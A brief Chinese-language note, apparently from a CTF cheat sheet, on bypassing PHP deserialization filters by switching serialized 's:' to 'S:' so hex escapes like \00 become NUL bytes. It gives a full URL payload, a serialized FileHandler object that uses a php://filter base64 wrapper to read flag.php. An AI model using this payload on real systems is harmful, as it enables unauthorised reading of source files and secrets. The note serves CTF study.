16进制转义绕过.md

通过将序列化文本中的s:<length>改为S:<length>来启用16进制转义

例如

/?str=O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";S:10:"\00*\00content";s:3:"123";}

中\00就被转义成了NUL这个字符

#Web #PHP #ASCII #反序列化 #bypass